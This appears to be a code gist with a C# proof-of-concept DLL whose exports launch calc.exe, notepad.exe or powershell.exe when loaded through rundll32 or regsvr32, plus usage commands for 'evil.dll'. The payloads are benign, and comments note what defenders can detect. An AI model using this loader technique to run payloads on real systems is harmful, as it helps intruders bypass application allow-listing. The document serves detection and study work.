@nicholasmckinney
Created May 8, 2017 00:33
Execute a DLL via Regsvr32
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
namespace Export
{
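/// <summary>
/// Proof-of-concept exports for a .NET DLL loaded by rundll32 or regsvr32.
/// Each export does exactly one thing: start a benign child process
/// (calc.exe, notepad.exe or powershell.exe). The observable side effect
/// in every case is the host binary (rundll32.exe / regsvr32.exe) becoming
/// the parent of that child process, which is the signal a defender would
/// key on when auditing this loading technique.
/// </summary>
class Test
{
    //rundll32 entry point
    /// <summary>
    /// Entry point in the shape rundll32 expects (window handle, module
    /// handle, command-line string, show-window flag). None of the
    /// parameters are read; the method only launches calc.exe.
    /// </summary>
    /// <param name="hwnd">Owner window handle supplied by rundll32 (unused).</param>
    /// <param name="hinst">Module handle supplied by rundll32 (unused).</param>
    /// <param name="lpszCmdLine">Remaining command line supplied by rundll32 (unused).</param>
    /// <param name="nCmdShow">Show-window flag supplied by rundll32 (unused).</param>
    [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
    public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
    {
        Launch("calc.exe");
    }

    /// <summary>
    /// Export regsvr32 invokes on a plain <c>regsvr32 evil.dll</c> call.
    /// Launches notepad.exe.
    /// </summary>
    [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
    public static void DllRegisterServer()
    {
        Launch("notepad.exe");
    }

    /// <summary>
    /// Export regsvr32 invokes on <c>regsvr32 /u evil.dll</c>.
    /// Launches powershell.exe.
    /// </summary>
    [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
    public static void DllUnregisterServer()
    {
        Launch("powershell.exe");
    }

    /// <summary>
    /// Shared launcher for the three exports: starts <paramref name="fileName"/>
    /// with an otherwise default <see cref="ProcessStartInfo"/> and releases the
    /// <see cref="Process"/> wrapper that <see cref="Process.Start(ProcessStartInfo)"/>
    /// returns. The original exports dropped that wrapper on the floor, leaking the
    /// process handle until the finalizer ran; disposing it does not affect the
    /// child process itself, only the handle held by this DLL.
    /// </summary>
    /// <param name="fileName">Program to start; resolved by the default shell-execute rules.</param>
    private static void Launch(string fileName)
    {
        ProcessStartInfo info = new ProcessStartInfo();
        info.FileName = fileName;
        // Process.Start may return null when an existing process is reused;
        // a using block tolerates null, so no extra check is needed.
        using (Process process = Process.Start(info))
        {
            // Nothing to wait for: the export returns as soon as the child exists.
        }
    }

    // To call/execute simply
    // regsvr32 /u evil.dll -->Calls DllUnregisterServer
    // [OR]
    // regsvr32 evil.dll --> Calls DllRegisterServer
}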
}
Base64 Encoded Sample (.NET 2.0 or Higher x64)
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